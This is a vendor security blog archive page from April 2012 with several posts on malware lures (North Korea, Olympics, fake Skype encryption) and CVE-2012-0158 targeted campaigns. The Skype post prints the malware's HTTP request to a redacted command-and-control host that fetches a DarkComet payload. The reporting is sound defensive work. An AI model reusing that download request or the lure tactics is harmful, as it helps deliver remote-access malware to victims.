Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Mobile Vulnerabilities

  • Zero-Day Alerts

  • Recent Posts

  • Calendar

    April 2012
    S M T W T F S
    « Mar   May »
  • Email Subscription

  • About Us

    Archive for April, 2012

    Using global political news as a social engineering hook is a popular cybercrime tool, particularly used to lure users into their malicious schemes. We have recently found a malicious file leveraging a noteworthy incident, one that leads to systems being infected with a backdoor.

    During the second of week of April, the most talked about news was North Korea’s failed attempt to launch a rocket. As expected, the bad guys are on the prowl for the next social engineering bait and the said news item was found the be the fitting choice.

    The file we found was named North Korea satellite launch eclipses that of Iran.doc. The said file, detected as TROJ_ARTIEF.DOC, may arrive as an attachment to an email message. Once executed, this Trojan exploits the vulnerability in RTF Stack Buffer Overflow Vulnerability (CVE-2010-3333) to drop the backdoor BKDR_POISON.DOC onto the system.

    This particular backdoor is able to execute some interesting routines. Based on our analysis, this backdoor communicates to a command and control server on TCP Port 443. The remote user may then command the backdoor to perform several commands, including initiating screen capture, webcam and audio file grabbing. This routine enables a remote attacker to monitor users’ activities in the infected system.

    This attack is reminiscent of similar cases we’ve reported in the past, wherein cybercriminals use messages with important-looking file names, which turn out to be malware that exploits particular vulnerabilities.

    Trend Micro protects users from this attack via products powered by the Trend Micro™ Smart Protection Network™. Moreover, Trend Micro Deep Security and Intrusion Defense Firewall prevents the exploit targeting CVE-2010-33 via rule 1004498 – Word RTF File Parsing Stack Buffer Overflow Vulnerability.

    With additional input from Nart Villeneuve

    Posted in Exploits, Malware, Targeted Attacks | Comments Off on North Korea Rocket Launch Used As Backdoor Lure

    We saw samples of email messages disguised as notifications from popular networking sites, in particular LinkedIn, foursquare, Myspace, and Pinterest. These spam contain links that direct users to bogus pharmaceutical or fraud sites. They also use legitimate-looking email addresses to appear credible to recipients. Using famous brands like these sites are effective in luring users to the scheme as this gives credence to an otherwise obvious scam.

    Fake foursquare Email Notifications

    We uncovered spammed messages masked as notifications from foursquare, a popular location-based social networking site. The first sample we found pretends to be an email alert, stating that someone has left a message for the recipient. The second message is in the guise of a friend confirmation notification.

    Both messages use the address in the ‘From’ field and bear a legitimate-looking MessageID. Similar to previous spam campaign using popular social networking sites, attackers here also disguised the malicious URLs. If users click these, the URLs direct to an empty web page containing another URL, which ultimately leads to a website selling sex-enhancement drugs.

    Read the rest of this entry »


    As mentioned in our previous post, the actors behind the targeted attack campaigns we’re monitoring updated, and still are updating, the tools of their trade to further their agenda and achieve exploitation. Using a fairly new vulnerability such as CVE-2012-0158, patched barely 2 weeks ago, may allow these attackers the window of opportunity to effectively infiltrate their targets.

    Moreover, the campaigns we’re seeing target sectors that span on a global scale, unlike the ones first seen and described in our previous post.


    Just this week, the actors behind one campaign that we’ve been seeing/monitoring have started to exploit CVE-2012-0158 via an attachment with an original filename of 子女教育補助費101新版.doc. A snapshot of the malicious email sent can be seen below:


    We’ve also seen this one sent to an industrial corporation in Japan, purportedly coming from another Japanese company:

    We’ve been monitoring attacks against the said corporation for quite some time now and previously, the CVE of choice is CVE-2009-3129. RTF file dropped is 20120420.doc, which could pertain to the date April 20, 2012, a day after the malicious document has been sent.

    Other malicious RTFs, exploiting CVE-2012-0158, that were also seen from Japan are as follows:

    • 献金を受け取る機構及び人のリスト.doc (rough translation – A list of organization and people to receive the donation.doc)

    • Development_plan_canon_2012.doc

    Incidentally, the dropped payload of the aforementioned RTF files, detected as TSPY_GEDDEL.EVL, was also seen as the same payload in this previous attack

    Russia, Vietnam and others…

    Other RTF files, also exploiting CVE-2012-0158, that we’ve seen targeted at a particular geographic audience include one that is supposedly targeted at a particular Russian audience, as the filename of the RTF file is ядерные материалы.doc whose literal translation is “nuclear materials.doc”, and a Vietnamese one with an original filename of Cập nhật tình hình 4.18.doc, meaning “Update 4:18.doc”. There were also submissions coming from India and Thailand as well – all exploiting CVE-2012-0158.

    CVE-2012-0158 – Here To Stay

    All in all, as captured above, as well as those seen by our friends in Contagio, we’ve seen various different targeted attacks now ramping up the usage of CVE-2012-0158 exploitation, in a span of just barely 2 weeks after the said vulnerability was patched by Microsoft. Moreover, the assumption of Contagio that there is an RTF generator being used by these campaigns is highly possible though we haven’t seen one yet. Evidently, this is now becoming a favorite method among those behind these targeted attack campaigns, and we’ll be seeing more of it.

    CVE-2012-0158’s popularity among attackers may be due to the fact that Microsoft owns more than 90% of productivity software market share. This alone increases the target base for cybercriminals. In addition, not everyone owns an update-able (licensed) copy of MS software, which doubles the risk for the targets.

    Trend Micro protects users

    Trend Micro Smart Protection Network ensures that spammed email as well as the malicious attachments are detected and removed immediately from computers. Trend Micro Deep Security users are also protected with the following rules:

    • 1004973 – MSCOMCTL.OCX RCE Vulnerability For Rich Text File(CVE-2012-0158)
    • 1004977 – Restrict Microsoft Windows Common ListView And TreeView ActiveX Controls
    • 1004978 – MSCOMCTL.OCX RCE Vulnerability For Office Binary File (CVE-2012-0158)

    Those who haven’t patched this vulnerability yet are advised to PATCH NOW. We can never be too sure on who will be targeted next.

    Posted in Bad Sites, Exploits, Malware, Targeted Attacks | Comments Off on CVE-2012-0158 Exploitation Seen in Various Global Campaigns

    The upcoming London Olympics is undoubtedly one of the most highly-anticipated sporting events of the year. It is also a favorite social engineering ploy among cybercriminals. Just recently, we found an Olympics scam in the form of a lottery that promises a free travel package to the event. Some online crooks, however, played it differently this time. Instead of the typical Olympic-related scams wherein users supposedly won tickets to the event, this scam arrives as spam disguised as an email advisory.

    As mentioned, this scam comes in the form of email messages that warn recipients of fake websites and organizations selling tickets to the London Olympics 2012. These mails contain the official logo of the event to possibly deceive users of its legitimacy. Included in the message is an attached .DOC file that lists these bogus ticket sellers. The attachment, however, is actually a malicious file detected by Trend Micro as TROJ_ARTIEF.ZIGS. The malware takes advantage of the RTF Stack Buffer Overflow Vulnerability (CVE-2010-3333) to drop the backdoor BKDR_CYSXL.A. This backdoor may perform several malicious routines, including deleting and creating files and shutting down the infected system.

    Readers who frequently visit this site surely know that this is just one of the many Olympic-related scams that we have seen in the past. As early as October 2008, spam messages were found masquerading as Olympic 2012 lottery notifications. Other sports events like the Beijing Olympics in 2008 and the FIFA World Cup were also no strangers to this type of ruse.

    As the London Olympics 2012 draws near, we are expecting this type of threats to proliferate. Thus, users should make it a habit to check the legitimacy of any message before downloading the attachment or clicking the links included in it.

    Trend Micro users are protected from this threat via Trend Micro™ Smart Protection Network™, which detects and deletes all the related malware. Trend Micro Deep Security also shields systems from being exploited via Rule 1004498 – Word RTF File Parsing Stack Buffer Overflow Vulnerability.

    To know more about previous threats that took advantage of the Olympics, World Cup and other major sporting events, you may read our entry Sports as Bait: Cybercriminals Play to Win.

    Posted in Malware, Spam, Vulnerabilities | Comments Off on Bogus Olympics 2012 Email Warning Blindsides Users With Malware

    As the conflict in Syria persists, the Internet continues to play an interesting role. As we reported in a previous post, there have been targeted attacks against Syrian opposition supporters. With activists’ continued use of social media, it is not surprising to read reports of targeted phishing attempts to steal Facebook and YouTube credentials. A CNN report also revealed that a malware was being propagated through Skype, which brings us to another Skype-themed attack that we have uncovered.

    We discovered a webpage that advertises a software that purports to provide encryption for Skype. This page is hosted in Syria on {BLOCKED}, which resolves to {BLOCKED}.{BLOCKED}.0.28 – the same server that acted as a command-and-control (C&C) server for previous attacks. The webpage features an embedded YouTube video that claims to be from “IT Security Lab” and to encrypt voice communications.

    If users are tricked into downloading the file, a program does appear that is supposed to encrypt users’ Skype data. The said file, Skype Encription v 2.1.exe, is detected by Trend Micro as BKDR_METEO.HVN. During the analysis, we did not find any evidence that the software actually provides any security properties.

    This file contains some interesting strings that suggest it was created by “SyRiAnHaCkErS”:

    Encription v 2.1.pdb

    The software then issues a connection:

    GET /SkypeEncription/Download/skype.exe HTTP/1.1
    Host: {BLOCKED}.{BLOCKED}.0.28
    Connection: Keep-Alive

    The downloaded file skype.exe, detected as BKDR_ZAPCHAST.HVN, is actually DarkComet version 3.3 and connects to {BLOCKED}.{BLOCKED}.0.28 on port 771. We were able to redirect the traffic in our test environment to confirm that it is indeed DarkComet.

    Once BKDR_ZAPCHAST.HVN is installed, the attackers are able to take full control of the compromised system through the DarkComet RAT. The features of the DarkComet RAT have been covered here and here.

    Note that Skype uses AES encryption on calls and instant messages, as well as its video conversations.

    Trend Micro users need not worry as they are protected from this threat via Trend Micro™ Smart Protection Network™ that detects and deletes the related malware. We are also continuously monitoring this campaign and will update users for any significant developments.



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice